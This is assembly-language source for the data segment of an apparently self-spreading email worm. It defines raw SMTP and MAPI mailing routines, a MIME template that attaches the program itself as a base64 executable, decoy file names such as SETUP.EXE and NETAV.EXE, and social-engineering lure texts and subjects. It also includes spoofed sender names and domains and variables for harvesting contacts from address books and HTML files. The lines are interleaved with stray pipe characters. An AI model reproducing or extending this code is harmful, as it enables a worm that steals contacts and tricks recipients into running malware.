EncodedFileSize dd 0
|
|||
|
MemEncoded dd 0
|
|||
|
MemToEncode dd 0
|
|||
|
OurSizeToEncode dd 0
|
|||
|
ByteReaded dd 0
|
|||
|
|
|||
|
;...................... Email SMTP Variables
|
|||
|
|
|||
|
Reg dd 1 ; String
|
|||
|
KeySize dd 0 ; Size to read with SHGetValue
|
|||
|
; (init it + return effectiv lenght read in)
|
|||
|
|
|||
|
AccountKey db 'Software\Microsoft\Internet Account Manager\Accounts\'
|
|||
|
AccountSubKey db 64 dup (0)
|
|||
|
|
|||
|
SmtpServeur db 64 dup (0) ; smtp server found with regkey
|
|||
|
|
|||
|
|
|||
|
wsocket dw 2 ; sin_family ever AF_INET
|
|||
|
dw ? ; the port
|
|||
|
ServeurIP dd ? ; addr of server node
|
|||
|
db 8 dup (?) ; not used
|
|||
|
|
|||
|
|
|||
|
hSocket dd 0 ; Socket Handle
|
|||
|
|
|||
|
ServeurReply dd ? ; error code
|
|||
|
ServeurReplyEnd db ? ; byte for LF
|
|||
|
|
|||
|
|
|||
|
CRLF equ <13,10>
|
|||
|
|
|||
|
cmd_helo db 'HELO Support',CRLF
|
|||
|
cmd_mailfrom db 'MAIL FROM:<'
|
|||
|
cmd_rcptto db 'RCPT TO:<'
|
|||
|
|
|||
|
cmd_data db 'DATA',CRLF
|
|||
|
cmd_term db CRLF,'.',CRLF
|
|||
|
cmd_quit db 'QUIT',CRLF
|
|||
|
|
|||
|
|
|||
|
MemMessageBody1 dd 0 ; Ptr on Mem where built header
|
|||
|
MessageSize1 dd 0 ; Size Header + bordel Mime
|
|||
|
|
|||
|
MessageBody1: db 'Mime-Version: 1.0',CRLF
|
|||
|
db 'Content-Type: multipart/mixed; boundary="--123"',CRLF,CRLF
|
|||
|
|
|||
|
db '----123',CRLF
|
|||
|
db 'Content-Type: text/plain; charset=us-ascii',CRLF
|
|||
|
db 'Content-Transfer-Encoding: 7bit',CRLF,CRLF,0
|
|||
|
|
|||
|
; Text part
|
|||
|
|
|||
|
MessageBody1b: db '----123',CRLF
|
|||
|
db 'Content-Type: application/octet-stream; name=',0 ; filename part
|
|||
|
MessageBody1c: db 'Content-Transfer-Encoding: base64',CRLF
|
|||
|
db 'Content-Disposition: attachment; filename=',0 ; filename part
|
|||
|
|
|||
|
; Encoded part
|
|||
|
|
|||
|
MessageBody2: db 10,'--123--',CRLF
|
|||
|
MessageSize2 equ $-MessageBody2
|
|||
|
|
|||
|
|
|||
|
RndFileName1 db '"SETUP.EXE"',0
|
|||
|
RndFileName2 db '"HGAME.EXE"',0
|
|||
|
RndFileName3 db '"MININET.EXE"',0
|
|||
|
RndFileName4 db '"NETAV.EXE"',0
|
|||
|
RndFileNameTb dd offset RndFileName1, offset RndFileName4, offset RndFileName3
|
|||
|
dd offset RndFileName4, offset RndFileName2
|
|||
|
NbRndFileName equ ($-offset RndFileNameTb)/4
|
|||
|
|
|||
|
RndText1: db 'Hi ',CRLF
|
|||
|
db 'Here is what you asked, bye. ',CRLF,0
|
|||
|
RndText2: db 'Hello ',CRLF
|
|||
|
db 'Maybe you could help me with this, bye. ',CRLF,0
|
|||
|
RndText3: db 'Hello ',CRLF
|
|||
|
db 'Now you can try it, bye. ',CRLF,0
|
|||
|
|
|||
|
RndTextTb dd offset RndText1, offset RndText2, offset RndText3
|
|||
|
NbRndText equ ($-offset RndTextTb)/4
|
|||
|
|
|||
|
RndSubject1 db 'Hello',0
|
|||
|
RndSubject2 db 'For you',0
|
|||
|
RndSubject3 db 'Try it',0
|
|||
|
RndSubject4 db 'Re:',0
|
|||
|
RndSubjectTb: dd offset RndSubject2, offset RndSubject1, offset RndSubject4
|
|||
|
dd offset RndSubject3, offset RndSubject4
|
|||
|
NbSubject equ ($-offset RndSubjectTb)/4
|
|||
|
|
|||
|
RndFromName1 db 'morgan',0
|
|||
|
RndFromName2 db 'mick',0
|
|||
|
RndFromName3 db 'carla',0
|
|||
|
RndFromName4 db 'eva',0
|
|||
|
RndFromNameTb: dd offset RndFromName1, offset RndFromName2, offset RndFromName3
|
|||
|
dd offset RndFromName4
|
|||
|
NbFromName equ ($-offset RndFromNameTb)/4
|
|||
|
|
|||
|
RndFromServ1 db '@caramail.com',0
|
|||
|
RndFromServ2 db '@hotmail.com',0
|
|||
|
RndFromServ3 db '@aol.com',0
|
|||
|
RndFromServTb: dd offset RndFromServ1, offset RndFromServ2, offset RndFromServ3
|
|||
|
NbFromServ equ ($-offset RndFromServTb)/4
|
|||
|
|
|||
|
|
|||
|
;...................... Email MAPI Variables
|
|||
|
|
|||
|
IConnectedStateTemp dd 0 ; For InternetConnectedState
|
|||
|
|
|||
|
MapiMessage equ $
|
|||
|
dd ?
|
|||
|
dd offset subject
|
|||
|
dd offset textmail
|
|||
|
dd ?
|
|||
|
dd offset date
|
|||
|
dd ?
|
|||
|
dd 2
|
|||
|
dd offset MsgFrom
|
|||
|
dd 1
|
|||
|
dd offset MsgTo
|
|||
|
dd 1
|
|||
|
dd offset MapiFileDesc
|
|||
|
|
|||
|
MsgFrom equ $
|
|||
|
dd ?
|
|||
|
dd ?
|
|||
|
dd offset namefrom
|
|||
|
dd offset mailfrom
|
|||
|
dd ?
|
|||
|
dd ?
|
|||
|
|
|||
|
MsgTo equ $
|
|||
|
dd ?
|
|||
|
dd 1
|
|||
|
dd offset nameto
|
|||
|
dd offset CurrentEmail
|
|||
|
dd ?
|
|||
|
dd ?
|
|||
|
|
|||
|
MapiFileDesc equ $
|
|||
|
dd ?
|
|||
|
dd ?
|
|||
|
dd ?
|
|||
|
dd offset MyPath ; File to attache
|
|||
|
dd ?
|
|||
|
dd ?
|
|||
|
|
|||
|
CurrentEmail db EmailSize dup (0)
|
|||
|
MAPISession dd 0
|
|||
|
|
|||
|
subject db 'Hello',0
|
|||
|
|
|||
|
date db '',0
|
|||
|
|
|||
|
namefrom db '',0
|
|||
|
|
|||
|
mailfrom db EmailSize dup (0)
|
|||
|
|
|||
|
nameto db '',0
|
|||
|
|
|||
|
textmail db 'Hi ',CRLF
|
|||
|
db 'Here is what you asked, bye... ',0
|
|||
|
|
|||
|
|
|||
|
;...................... Residency + Dump Variables
|
|||
|
|
|||
|
MutexHdl dd 0
|
|||
|
MyPath db 260 dup (0)
|
|||
|
TempFileHandle dd 0
|
|||
|
ByteWritten dd 0
|
|||
|
|
|||
|
;...................... Email Search Variables
|
|||
|
|
|||
|
NbEmailFound dd 0 ; Compte combien d'email found
|
|||
|
EmailList dd 0 ; Ptr zone Mem ou stocker Emails
|
|||
|
|
|||
|
TempPath&Name db 260 dup (0)
|
|||
|
|
|||
|
fhandle dd 0 ; To find & map file
|
|||
|
mapaddress dd 0
|
|||
|
maphandle dd 0
|
|||
|
|
|||
|
maphandlemail dd 0 ; for html found
|
|||
|
esi_save dd 0
|
|||
|
EmailCurrentPos dd 0
|
|||
|
|
|||
|
RandomNb dd 0 ; Init with GettickCount
|
|||
|
|
|||
|
NbWabEmail dd 0 ; Nb emails in *.Wab
|
|||
|
|
|||
|
;...................... Recursive Search Variables
|
|||
|
|
|||
|
RecSearchHandle dd 0 ; For the Recursive search
|
|||
|
RoutineToCall dd 0 ; Ptr on routine to execute in all SubDir
|
|||
|
|
|||
|
PersonalSearchHandle dd 0 ; For personal doc search
|
|||
|
NbPersonalFound dd 0 ; Nb Personal doc found
|
|||
|
PersoDocListe dd 0 ; Ptr zone Mem ou stocker Path Doc Perso
|
|||
|
|
|||
|
;--------------------------- Structures Zone ---------------------------------
|
|||
|
|
|||
|
;...................... Search File Structure
|
|||
|
|
|||
|
filetim struct
|
|||
|
FT_dwLowDateT dd ?
|
|||
|
FT_dwHighDateT dd ?
|
|||
|
filetim ends
|
|||
|
|
|||
|
w32fd struct
|
|||
|
FileAttributes dd ?
|
|||
|
CreationTime filetim ?
|
|||
|
LastAccessTime filetim ?
|
|||
|
LastWriteTime filetim ?
|
|||
|
FileSizeHigh dd ?
|
|||
|
FileSizeLow dd ?
|
|||
|
Reserved0 dd ?
|
|||
|
Reserved1 dd ?
|
|||
|
FileName db 260 dup (0)
|
|||
|
AlternateFileN db 13 dup (?)
|
|||
|
db 3 dup (?)
|
|||
|
w32fd ends
|
|||
|
|
|||
|
search w32fd ?
|
|||
|
|
|||
|
;...................... System Time Structure
|
|||
|
|
|||
|
SystemTimeData equ $
|
|||
|
STDYear dw ?
|
|||
|
STDMonth dw ?
|
|||
|
STDDayOfWeek dw ?
|
|||
|
STDDay dw ?
|
|||
|
STDHour dw ?
|
|||
|
STDMinute dw ?
|
|||
|
STDSecond dw ?
|
|||
|
STDMilliseconds dw ?
|
|||
|
|
|||
|
;...................... Sockets Structure
|
|||
|
|
|||
|
WSAData equ $
|
|||
|
dw ?
|
|||
|
dw ?
|
|||
|
db 257 dup (?)
|
|||
|
db 129 dup (?)
|
|||
|
dw ?
|
|||
|
dw ?
|
|||
|
dd ?
|
|||
|
|
|||
|
|
|||
|
end Mv
|
|||
|
|